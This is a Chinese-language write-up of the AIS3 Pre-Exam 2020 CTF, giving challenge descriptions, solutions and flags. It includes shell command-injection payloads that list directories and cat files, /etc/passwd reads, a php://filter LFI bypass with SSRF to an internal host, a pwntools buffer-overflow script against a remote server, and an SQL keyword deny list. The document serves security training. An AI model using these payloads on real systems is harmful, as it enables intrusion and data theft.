--- title: AIS3 Pre-Exam 2020 WriteUp tags: AIS3,Pre-Exam,CTF,2020WriteUp --- # AIS3 Pre-Exam 2020 WriteUp ## 🌐Web ### 🐘Elephant :::success 題目說明: Do elephants love cookies? https://elephant.ais3.org/ IMPORTANT - There’s a hint in the webpage ::: 解法: 1. 獲得cookie 2. Base64 Decode 3. 修改序列化的錯誤參數 4. Base64 Encode 5. 透過Cookie edit 把剛剛Encode的編碼放上去 6. F5 Flag: ### <span style="color:#ffffff">AIS3{0nly_3l3ph4n75_5h0uld_0wn_1v0ry}</span> --- ### 🐿️Squirrel :::success 題目說明: Hack those creepy rats. https://squirrel.ais3.org/ ::: 解法: 進入網頁後看Source Code 發現一段JS ```javascript= const squirrelFile = '/etc/passwd'; fetch('api.php?get=' + encodeURIComponent(squirrelFile)) .then(res => res.json()) .then(data => { if ('error' in data) { throw data.error; } data.output.split('\n') .map(line => line.split(':')[0].trim()) .filter(name => name.length) .forEach(name => new Squirrel(name).update()); }) .catch(err => { console.log(err); alert('Something went wrong! Please report this to the author!'); }); ``` Get ```/api.php?get=``` 發現會Response一段JSON ```json= {"error":"empty file path"} ``` 繼續Get ```?get=/etc/passwd``` 會Response /etc/passwd裡的資料 ```json= {"output":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n"} ``` 推測是Command Injection OR Local File Include 繼續嘗試 ```?get=';ls'``` Response: ```json= {"output":"api.php\ncss\nindex.html\njs\n"} ``` 可以確定是CMDi 那就嘗試找找Flag在哪 Get ```?get=';ls /'``` Response: ```json= {"output":"5qu1rr3l_15_4_k1nd_0f_b16_r47.txt\nbin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n"} ``` 發現有個可疑檔案 推測它就是 Flag 嘗試 Cat 它 Get ```?get=';cat /5qu1rr3l_15_4_k1nd_0f_b16_r47.txt'``` Flag: ### <span style="color:#ffffff">AIS3{5qu1rr3l_15_4_k1nd_0f_b16_r47}</span> --- ### 🦈Shark :::success 題目說明: Let’s dive deep again this year. https://shark.ais3.org/ ::: 進入網頁發現有個HyperLink 點進去後出現Hint ``` Please find the other server in the internal network! (flag is on that server) GET http://some-internal-server/flag ``` 看URL發現是透過Get /?path=hint.txt 推測有LFI 的問題 嘗試Get /?path=index.php 成功看到Source Code ```php= <?php if ($path = @$_GET['path']) { if (preg_match('/^(\.|\/)/', $path)) { // disallow /path/like/this and ../this die('<pre>[forbidden]</pre>'); } $content = @file_get_contents($path, FALSE, NULL, 0, 1000); die('<pre>' . ($content ? htmlentities($content) : '[empty]') . '</pre>'); } ?><!DOCTYPE html> <head> <title>🦈🦈🦈</title> <meta charset="utf-8"> </head> <body> <h1>🦈🦈🦈</h1> <a href="?path=hint.txt">Shark never cries?</a> </body> ``` Hint說要找其他內網機器尋找上面的Flag 所以要嘗試看看機器的```/etc/host``` 透過Source Code發現path有上RE 要想辦法Bypass它 嘗試用Base64 Bypass Payload:```?path=php://filter/convert.base64-encode/resource=/etc/hosts``` Response: ``` MTI3LjAuMC4xCWxvY2FsaG9zdAo6OjEJbG9jYWxob3N0IGlwNi1sb2NhbGhvc3QgaXA2LWxvb3BiYWNrCmZlMDA6OjAJaXA2LWxvY2FsbmV0CmZmMDA6OjAJaXA2LW1jYXN0cHJlZml4CmZmMDI6OjEJaXA2LWFsbG5vZGVzCmZmMDI6OjIJaXA2LWFsbHJvdXRlcnMKMTcyLjIyLjAuMwkwMmIyMzQ2NzQ4NWUK ``` Base64 Decode: ``` 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 172.22.0.3 02b23467485e ``` 發現Host是172.22.0.3 那嘗試看看.2和.4有沒有東西 發現.2有東西 ```htmlmixed= <!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> ``` 嘗試找找Flag Payload:```?path=http://172.22.0.2/flag``` Flag: ### <span style="color:#ffffff">AIS3{5h4rk5_d0n’7_5w1m_b4ckw4rd5}</span> --- ### 🐍Snake :::success 題目說明: How to read that flag? https://snake.ais3.org/ Source Code: ```python= from flask import Flask, Response, request import pickle, base64, traceback Response.default_mimetype = 'text/plain' app = Flask(__name__) @app.route("/") def index(): data = request.values.get('data') if data is not None: try: data = base64.b64decode(data) data = pickle.loads(data) if data and not data: return open('/flag').read() return str(data) except: return traceback.format_exc() return open(__file__).read() ``` ::: :::danger 似乎非正規解 ::: 解法: Python Serialization and Base64 code ```python= import pickle import base64 if __name__ == '__main__': pickled = pickle.dumps("print('open('/flag').read()')") print(base64.b64encode(pickled)) ``` Quest Python Test Code ```python= import pickle import base64 import os data3 = 'success' data2 = 'gASVCQAAAAAAAACMBWRhdGEzlC4=' data = 'gASVCQAAAAAAAACMBWRhdGEzlC4=' data = base64.b64decode(data) print(data) data = pickle.loads(data) print(data) if data and not data: print('true') else: print('false') print(data) print(str(print((data)))) ``` Payload ```python ?data=gASVIQAAAAAAAACMHXByaW50KCdvcGVuKCcvZmxhZycpLnJlYWQoKScplC4= ``` Flag: ### <span style="color:#ffffff">AIS3{7h3_5n4k3_w1ll_4lw4y5_b173_b4ck.}</span> --- ### 🦏Rhino :::success 題目說明: Do you know why is this challenge called Rhino? https://rhino.ais3.org/ /package.json ```json= // 20200612172354 // https://rhino.ais3.org/package.json { "name": "app", "version": "1.0.0", "description": "", "scripts": { "start": "node chill.js", "test": "echo \"Error: no test specified\" && exit 1" }, "author": "djosix", "license": "ISC", "dependencies": { "cookie-session": "^1.4.0", "express": "^4.17.1" } } ``` /chill.js ```javascript= const express = require('express'); const session = require('cookie-session'); let app = express(); app.use(session({ secret: "I'm watching you." })); app.use('/', express.static('./')); app.get('/flag.txt', (req, res) => { res.setHeader('Content-Type', 'text/plain'); let n = req.session.magic; if (n && (n + 420) === 420) res.sendFile('/flag'); else res.send('you are a sad person too'); }); app.get('*', function(req, res){ res.status(404).sendFile('404.html', { root: __dirname }); }); app.listen(process.env.PORT, '0.0.0.0'); ``` ::: --- ### 🦉Owl :::success 題目說明: Flag is inside the database. https://turtowl.ais3.org/ **IMPORTANT** - There's a hint in the webpage - This is a hybrid challenge with Turtle in Crypto /?source ```php= <?php if (isset($_GET['source'])) { highlight_file(__FILE__); exit; } // Settings ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); date_default_timezone_set('Asia/Taipei'); session_start(); // CSRF if (!isset($_SESSION['csrf_key'])) $_SESSION['csrf_key'] = md5(rand() * rand()); require_once('csrf.php'); $csrf = new Csrf($_SESSION['csrf_key']); if ($action = @$_GET['action']) { function redirect($path = '/', $message = null) { $alert = $message ? 'alert(' . json_encode($message) . ')' : ''; $path = json_encode($path); die("<script>$alert; document.location.replace($path);</script>"); } if ($action === 'logout') { unset($_SESSION['user']); redirect('/'); } else if ($action === 'login') { // Validate CSRF token $token = @$_POST['csrf_token']; if (!$token || !$csrf->validate($token)) { redirect('/', 'invalid csrf_token'); } // Check if username and password are given $username = @$_POST['username']; $password = @$_POST['password']; if (!$username || !$password) { redirect('/', 'username and password should not be empty'); } // Get rid of sqlmap kiddies if (stripos($_SERVER['HTTP_USER_AGENT'], 'sqlmap') !== false) { redirect('/', "sqlmap is child's play"); } // Get rid of you $bad = [' ', '/*', '*/', 'select', 'union', 'or', 'and', 'where', 'from', '--']; $username = str_ireplace($bad, '', $username); $username = str_ireplace($bad, '', $username); // Auth $hash = md5($password); $row = (new SQLite3('/db.sqlite3')) ->querySingle("SELECT * FROM users WHERE username = '$username' AND password = '$hash'", true); if (!$row) { redirect('/', 'login failed'); } $_SESSION['user'] = $row['username']; redirect('/'); } else { redirect('/', "unknown action: $action"); } } $user = @$_SESSION['user']; ?><!DOCTYPE html> <head> <title>🦉🦉🦉🦉</title> <meta charset='utf-8'> <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css"> <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> </head> <body> <?php if (!$user): ?> <div id="login"> <h3 class="text-center text-white pt-5">GUESS THE STUPID USERNAME / PASSWORD</h3> <div class="container"> <div id="login-row" class="row justify-content-center align-items-center"> <div id="login-column" class="col-md-6"> <div id="login-box" class="col-md-12"> <form id="login-form" class="form" action="?action=login" method="post"> <input type="hidden" name="csrf_token" value="<?= htmlentities($csrf->generate()) ?>"> <h3 class="text-center text-info">🦉: "Login to see cool things!"</h3> <div class="form-group"> <label for="name" class="text-info">Username:</label><br> <input type="text" name="username" id="username" class="form-control"><br> <label for="name" class="text-info">Password:</label><br> <input type="text" name="password" id="password" class="form-control"><br> </div> <div class="form-group"> <input type="submit" name="submit" class="btn btn-info btn-md" value="Login"> </div> </form> </div> </div> </div> </div> </div> <?php else: ?> <h3 class="text-center text-white pt-5"><a style="color: white" href="/?source">SHOW HINT</a></h3> <div class="container"> <div class="row justify-content-center align-items-center"> <div class="col-md-6"> <div class="col-md-12"> <h3 class="text-center text-info">Nothing</h3> Hello, <b><?= htmlentities($user) ?></b>, nothing here. <a href="?action=logout">Logout!</a> </div> </div> </div> </div> <?php endif ?> </body> ``` ::: --- ## 💥 Pwn ### 👻 BOF :::success 題目說明: That is easy-peasy challenge and even my grandma can do. nc 60.250.197.227 10000 Challenge environment: Ubuntu 18.04 檔案: [bof-767fdf896cf9838c0294db24eaa1271ebf15a6e638a873e94ab9682ef28464b4](https://drive.google.com/file/d/1Yt25hbllbcHq3-R6POqEvWRwdC7yq1ek/view?usp=sharing) ::: 解法: ``` python= from pwn import * context.log_level = 'debug' r = remote('60.250.197.227', '10000') payload = b'a' * (0x30 + 8) + p64(0x400688) r.recvline() r.sendline(payload) r.interactive() ``` Flag: ### <span style="color:#ffffff">AIS3{OLd_5ChOOl_tr1ck_T0_m4Ke_s7aCk_A116nmeNt}</span> --- ### 📃 Nonsense :::success 題目說明: Welcome to Rick and Morty’s crazy world. Say something! Rick’s stupid nonsense catchphrase is “wubba lubba dub dub”. nc 60.250.197.227 10001 Challenge environment: Ubuntu 18.04 檔案: [nonsense-8ccbca2ca7f8825c843596a09c0806275a5b3fdf1c6c570bc0276fb0afc9210c](https://drive.google.com/file/d/1vHYdgI4I1X2y-Tnzbbxb3NnssW8CIqq3/view?usp=sharing) ::: --- ### 🔫 Portal gun :::success 題目說明: The Portal Gun is a gadget that allows the user(s) to travel between different universes/dimensions/realities. Try to get the shell and avoid the hook! nc 60.250.197.227 10002 Challenge environment: Ubuntu 18.04 檔案: [hook.so-997c848132f9fae3a5ffdb0edf7c9071a0dcdebb99c116c5bd011efd28c942ae](https://drive.google.com/file/d/1LLTs6n2BVkBN6KiG0dB_ai0k9tlO2vCe/view?usp=sharing) [portal_gun-43fcd0f6ae670ddb11a66bbfbca721410941ee30a5d1d802a6f509bcf7a765ac](https://drive.google.com/file/d/1sx55VZwfneXlnw1Jf2VbSdkW5NFacdMb/view?usp=sharing) [libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing) ::: --- ### 🏫 Morty school :::success 題目說明: Welcome to Morty school ^_^ We need you to teach Morty. And then you can get the shell! nc 60.250.197.227 10003 Challenge environment: Ubuntu 18.04 檔案: [morty_school-d97056f03b991d718b35ef47fcfcaeb15f971b60b58d0eb0fcd8dcf3a3a11a99](https://drive.google.com/file/d/1E7Cv1OwAvCI2lPIYzo5A-TTV1hX34eb0/view?usp=sharing) [libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing) ::: --- ### 🔮Death crystal :::success 題目說明: Death Crystals are crystals found on Forbodulon Prime that allow those who wield it to foresee their death in multiple possible future scenarios. Before you died, you can see the message I left. nc 60.250.197.227 10004 Challenge environment: Ubuntu 18.04 檔案: [death_crystal-5c5baf0fb1ef4690eb472dc579403af6248be7a6815a89906b2c22ce55d73529](https://drive.google.com/file/d/1eR_wiZAKBI_ZdOIvVUJBrWItKdy9z__A/view?usp=sharing) ::: --- ### 📦Meeseeks box :::success 題目說明: The Mr. Meeseeks Box is a gadget that creates a Mr. Meeseeks for the purpose of completing one given objective. Just keep your requests simple. They are not Gods. nc 60.250.197.227 10005 Challenge environment: Ubuntu 18.04 檔案: [meeseeks_box-46937361847a6ed6df9ee20eea7eb59b70db5d9779ca2b94e481bc57fd130873](https://drive.google.com/file/d/1GGkKUbjpchOD37nvShvzEigw-n7rcbbY/view?usp=sharing) [libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing) ::: --- ## ♻️Reverse ### 🍍TsaiBro :::success 題目說明: 很好....你很腦殘嗎....敢這樣講刀劍神域.......我死也不會放過你 我..要..殺死...你.. ![](https://i.imgur.com/wKDoZs7.gif) author: terrynini 檔案: [TsaiBro](https://drive.google.com/file/d/16LfYgKEg017QKdbaQb6lbxPPi_5WnBDO/view?usp=sharing) [TsaiBroSaid](https://drive.google.com/file/d/1_xdHlOqWxT2exa4XvO5YEum8z0fER_gc/view?usp=sharing) ::: 解法: 兩種解題方法 1. IDA Pro 反組譯 看Code算規律,再寫Code直接List出來 2. 暴力找規律,建表後一個一個對 密碼表: ``` 11 5 21 W 31 a 41 S 51 K 61 w 71 i 81 C 12 6 22 X 32 b 42 T 52 L 62 f 72 j 82 D 13 7 23 Y 33 c 43 U 53 M 63 g 73 k 83 E 14 8 24 0 34 d 44 V 54 N 64 h 74 l 84 F 15 9 25 y 35 m 45 G 55 u 65 q 75 O 85 1 16 { 26 z 36 n 46 H 56 v 66 r 76 P 86 2 17 } 27 A 37 o 47 I 57 w 67 s 77 Q 87 3 18 _ 28 B 38 p 48 J 58 x 68 t 78 R 88 4 ``` 密文: ``` Terry...逆逆...沒有...學問...單純...分享...個人...生活...感觸... 發財..發財.......發財....發財.......發財....發財.發財........發財.......發財.發財......發財..發財.....發財........發財.......發財......發財.......發財.發財........發財..發財.....發財..發財....發財.....發財.....發財.發財........發財......發財....發財........發財........發財.....發財......發財......發財.發財.發財........發財......發財.......發財........發財........發財.....發財.......發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財...發財...發財......發財....發財........發財........發財.......發財....發財.......發財....發財........發財.......發財...發財......發財......發財...發財........發財.......發財.發財........發財...發財..發財......發財.發財......發財..發財..發財....發財......發財......發財........發財.......發財.發財........發財...發財..發財.....發財.....發財.發財...發財.發財........發財.......發財.發財......發財........發財......發財.......發財.發財........發財...發財.....發財..發財....發財......發財......發財........發財.......發財.發財........發財.......發財....發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財......發財......發財...發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財......發財........發財........發財.....發財...發財.....發財........發財.......發財.發財....... ``` Flag: ### <span style="color:#ffffff">AIS3{y3s_y0u_h4ve_s4w_7h1s_ch4ll3ng3_bef0r3_bu7_its_m0r3_looooooooooooooooooong_7h1s_t1m3}</span> --- ### 🎹Fallen Beat :::success 題目說明: CTF player, 我要挑戰你, I'm gonna challenge you!! ZR 這是我的室友兼 lab 同學, 他已經考過金框暴龍天,他是個旋鈕人, 不像你是個敲鍵盤的, 所以我要測測你的程度到哪裡, 就用 ZR 的大一 project 來決勝負吧!! 得到 Full Combo 來讓我刮目相看!! author: terryninien 檔案: [Fallen_Beat.zip](https://drive.google.com/file/d/1kn5hq1zNFZL6n8A30avGzPU0rM8k0kKP/view?usp=sharing) ::: 解法: 1. 用Redare2反編譯 2. 發現 enflag array 3. 與hell.txt譜面進行XOR運算,得FLAG *注:hell.txt譜面,頭兩行不要 Code: ```javascript= var fs = require("fs"); var cache = fs.readFileSync("hell.txt", "utf8").split("\n").map(v=>parseInt(v)); var enflag = [89, 74, 75, 43, 126, 69, 120, 109, 68, 109, 109, 97, 73, 110, 45, 113, 102, 64, 121, 47, 111, 119, 111, 71, 114, 125, 68, 105, 127, 124, 94, 103, 46, 107, 97, 104]; for(var i=0 ; i < cache.length ; i++){ var flag = enflag; var n = i % enflag.length; flag[n] ^= cache[i]; } console.log(enflag.map(v=>String.fromCharCode(v))); ``` Flag: ### <span style="color:#ffffff">AIS3{Wow_how_m4ny_h4nds_do_you_h4ve}</span> --- ### 🧠 Stand up!Brain :::success 題目說明: 又到了 Brain tell 咪 ㄜ joke 的時間了 這次輪到你說個笑話來聽聽了 ![](https://i.imgur.com/NBW5qTC.png =500x500) author: terrynini 檔案: [joke](https://drive.google.com/file/d/1gre6j8LYsE0ZtvjU9FYoJGqPsye6BpwB/view?usp=sharing) ::: 解法: 1. Linux Terminal Command 'string joke' 2. look string ``` -------------------------------------------------------------------[>[-]<[-]]>[>--------------------------------------------------------[>[-]<[-]]>[>-------------------------------------------------------[>[-]<[-]]>[>------------------------------------------------------[>[-]<[-]]>[>---------------------------------------------------[>[-]<[-]]>[>---------------------------------[>[-]<[-]]>[>>----[---->+<]>++.++++++++.++++++++++.>-[----->+<]>.+[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]] ``` 3. Brainfuck encode 'AIS3\{' ``` ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++. ``` 4. 將前面一段替換掉成 ``` ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]] ``` Flag: ### <span style="color:#ffffff">AIS3{Th1s_1s_br4iNFUCK_bu7_m0r3_ez}</span> --- ### 🍹Long Island Iced Tea :::success 題目說明: 長·島·冰·茶 我·的·最·愛 長·島·冰·茶 超·爽·口·感 咚咚咚ㄎㄧㄤ 咚咚咚ㄎㄧㄤ 咚咚咚ㄎㄧㄤ 我真的好ㄎㄧㄤ author: terrynini 檔案: [Long_Island_Iced_Tea](https://drive.google.com/file/d/10Y7q5JH5_gU2ZdPstOIpS2kJn76ccsYC/view?usp=sharing) [flag](https://drive.google.com/file/d/1d3XtGbBiY_LdXrQ6OPG5bfSfOxu4en_I/view?usp=sharing) ::: --- ### 🌹La vie en rose :::success 題目說明: ![](https://i.imgur.com/4Tu5Jvb.jpg) author: terrynini 檔案: [La_vie_en_rose.exe](https://drive.google.com/file/d/1qQ5imPkqwNRlt1HQfmwn3N27LoSuKjpm/view?usp=sharing) ::: --- ### 🐉Uroboros :::success 題目說明: 你好啊愛德華大哥哥,真的沒想到你可以到第二十五層來呢! 不過就到這裡為止了, 接下來就由我 反重力三頭鎖鏈康妮·解放·緋紅 來做你的對手! ![](https://i.imgur.com/3haxMga.png) author: terrynini 檔案: [Uroboros](https://drive.google.com/file/d/18BSyZ0tWJ1QPnhoiGRHij8xXdTQJAT0U/view?usp=sharing) ::: --- ## 🙊Crypto ### 🦕Brontosauru :::success 題目說明: Brontosaurus peek at last year’s problems with a long neck and picked up “KcufsJ”. 檔案: [KcufsJ](https://drive.google.com/file/d/1Iet8O_dDwt1ygqZ_F2jXG_7JkBofVF5-/view?usp=sharing) ::: 解法: 字串反轉之後丟上F12的工具即可 Flag: ### <span style="color:#ffffff">AIS3{Br0n7Os4uru5_ch3at_3asi1Y}</span> --- ### 🦖T-Rex :::success 題目說明: Tyrannosaurus-rex is an nihilist. 檔案: [prob](https://drive.google.com/file/d/17giKiJcFrW1UNuK8Mz5CEU64nTUEeQ12/view?usp=sharing) ::: 解法: 兩種解題方法 1. 寫Code List 2. 一個一個對 密碼表: ``` !! V @! F #! Y $! %! 6 &! 1 !@ S @@ 0 #@ M $@ %@ 9 &@ L !# I @# W ## H $# %# 4 &# Q !$ K @$ G #$ B $$ %$ T &$ A !% E @% 3 #% C $% %% P &% N !& U @& Z #& 8 $& %& D && O ``` 密文: ``` &$ !# $# @% { %$ #! $& %# &% &% @@ $# %# !& $& !& !@ _ $& @% $$ _ @$ !# !! @% _ #! @@ !& _ $# && #@ !% %$ ## !# &% @$ _ $& &$ &% %& && #@ _ !@ %$ %& %! $$ &# !# !! &% @% ## $% !% !& @! #& && %& !% %$ %# %$ @% ## %@ @@ $% ## !& #% %! %@ &@ %! &@ %$ $# ## %# !$ &% @% !% !& $& &% %# %@ #$ !# && !& #! %! ## #$ @! #% !! $! $& @& %% @@ && #& @% @! @# #@ @@ @& !@ %@ !# !# $# $! !@ &$ $@ !! @! &# @$ &! &# $! @@ &@ !% #% #! &@ &$ @@ &$ &! !& #! !# ## %$ !# !# %$ &! !# @# ## @@ $! $$ %# %$ @% @& $! &! !$ $# #$ $& #@ %@ @$ !% %& %! @% #% $! !! #$ &# ## &# && $& !! !% $! @& !% &@ !& $! @# !@ !& @$ $% #& #$ %@ %% %% &! $# !# $& #@ &! !# @! !@ @@ @@ ## !@ $@ !& $# %& %% !# !! $& !$ $% !! @$ @& !& &@ #$ && @% $& $& !% &! && &@ &% @$ &% &$ &@ $$ } ``` Flag: ### <span style="color:#ffffff">AIS3{TYR4NN0S4URU5_R3X_GIV3_Y0U_SOMETHING_RANDOM_5TD6XQIVN3H7EUF8ODET4T3H907HUC69L6LTSH4KN3EURN49BIOUY6HBFCVJRZP0O83FWM0Z59IISJ5A2VFQG1QJ0LECYLA0A1UYIHTIIT1IWH0JX4T3ZJ1KSBRM9GED63CJVBQHQORVEJZELUJW5UG78B9PP1SIRM1IF500H52USDPIVRK7VGZULBO3RRE1OLNGNALX} </span> --- ### 🐡 Blowfish :::success 題目說明: Don’t poke the puffer, it is poisonous. nc 60.250.197.227 12001 檔案: [prob.py](https://drive.google.com/file/d/1O7Z_KQPeOZwqc9Jedk6hi6wBHfPoSdtD/view?usp=sharing) [user.pickle](https://drive.google.com/file/d/1HcThNkHu3LRfOuWuTSS-TS7UEpaAyCSE/view?usp=sharing) ::: --- ### 🐙 Octopus :::success 題目說明: BB84 quantum key distribution has 8 main directions, just like a cute octopus A __ A. 檔案: [prob.py](https://drive.google.com/file/d/1QQrcGTj3f5K1M2PAt-bsFmhhLXBlJJ4b/view?usp=sharing) [output](https://drive.google.com/file/d/1ThoYj8JCxCYht9XINRBkZXUKxb15JRPh/view?usp=sharing) ::: --- ### 🐪Camel :::success 題目說明: Wow!! There is an elliptic curve on the camel. 檔案: [prob.sage](https://drive.google.com/file/d/1LHWrLNpxwwE8UUBKWHzYFxQxV9iVIUF-/view?usp=sharing) ::: --- ### 🐢Turtle :::success 題目說明: Try to decrypt the secret! https://turtowl.ais3.org/csrf.php?source /csrf.php?source ```php <?php class Csrf { private $secret, $key, $size; function __construct($key) { $this->key = $key; $this->secret = file_get_contents('/turtle.flag'); $this->size = openssl_cipher_iv_length('aes-256-cbc'); } function generate() { $iv = openssl_random_pseudo_bytes($this->size); $cipher = openssl_encrypt($this->secret, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv); $token = base64_encode($iv . $cipher); return $token; } function validate($token) { $bytes = base64_decode($token); $iv = substr($bytes, 0, $this->size); // extract IV $cipher = substr($bytes, $this->size); // extract cipher $secret = openssl_decrypt($cipher, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv); if ($secret === false) throw new Exception('token decryption failed'); return $secret === $this->secret; } } if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) { // called directly if (isset($_GET['source'])) { highlight_file(__FILE__); } exit; } ``` ::: --- ## 🐧Misc ### 💤Piquero 題目說明: :::success I can’t see the flag. Where is it? 檔案: [Piquero_99c9aa83fe492df8d52229017d4dca92297c9aeb.jpg](https://drive.google.com/file/d/1mqoDQhHYXNlOwrypXyqhF8Wff6xbKHNe/view?usp=sharing) ![](https://i.imgur.com/pJsBfG3.jpg) ::: 解法: 用[線上工具](https://www.dcode.fr/braille-alphabet)交叉比對 有些特殊符號要注意一下 Flag: ### <span style="color:#ffffff">AIS3{I_feel_sleepy_Good_Night!!!}</span> --- ### 🐥Karuego :::success 題目說明: Students who fail to summon will be dropped out. 檔案: [Karuego_0d9f4a9262326e0150272debfd4418aaa600ffe4.png](https://drive.google.com/file/d/1M1fHQek1wvzoN_zlL2khf8g_7dqdOZtr/view?usp=sharing) ::: 解法: 透過binwalk可以看到是個zip檔並且有加密 使用dd將隱藏的Zip抽出 利用fcrackzip可以爆破密碼 之後就可以在裡面的圖片上看到flag Flag: ### <span style="color:#ffffff">AIS3{Ar3_y0u_r34l1y_r34dy_t0_sumnn0n_4_D3m0n?}</span> --- ### 🌱Soy :::success 題目說明: Here is your flag. Oops, my bad. 檔案: [Soy_b692c44dd2a32b30eee8a9315091d79f7dd8c8a8.png](https://drive.google.com/file/d/1Stc9XrOMHD-bfRDfFMjB4F_sZEyOAPyN/view?usp=sharing) ![](https://i.imgur.com/mEb4gwg.png =700x500) ::: 解法: 使用這個[線上工具](https://merricx.github.io/qrazybox/)將尚可解讀的部分先仿畫出來 再利用右上Tools > Extract QR Information 強制將資訊破解出來 Flag: ### <span style="color:#ffffff">AIS3{H0w_c4n_y0u_f1nd_me?!?!?!!}</span> --- ### 👑Saburo :::success 題目說明: Spell you flag and fight with me. PS. flag is printable characters with AIS3{…} nc 60.250.197.227 11001 ::: 解法: 寫Code爆破 Flag: ### <span style="color:#ffffff">AIS3{A1r1ght_U_4r3_my_3n3nnies}</span> --- ### 👿Shichirou :::success 題目說明: Don’t cheat!!! I’m wathcing you!! nc 60.250.197.227 11000 檔案:[Shichirou_1869833657e9fef14ad2742e59bb96f4630db429.py](https://drive.google.com/file/d/1hDUlaWGPNC4HRY2_hD6MET0ShVgpslvS/view?usp=sharing) ::: --- ### 🧸Clara :::success 題目說明: I did nothing special today. >_< 檔案: [Clara_62f0b78d6dea918a20ba2965e9103c5098307969.pcapng](https://drive.google.com/file/d/1tC9G8oMxqF3r9mjA9opnrW5a09YDGhvV/view?usp=sharing) ::: :::success :::spoiler Hint1 **Defender: Malware Detected !!** WTF, someone is monitoring me ?! There are several encrypted data sent, but they looks a little be weird ? ::: :::success :::spoiler Hint2 Keyword: malware, monitor, encrypted data The two malicious conversations sent exactly the same things. The connection between malware and C&C are broken one time. ::: :::success :::spoiler Hint3 Malware Design Principle Communication - Make sure that everything is encrypted. - Use static key or do key exchange in the beginning. - Socket is suck, C&C should know what and how you send in advance. There are several files sent together in each conversation. As a malware developer, how would you design the communication between malware and C&C ? ::: ---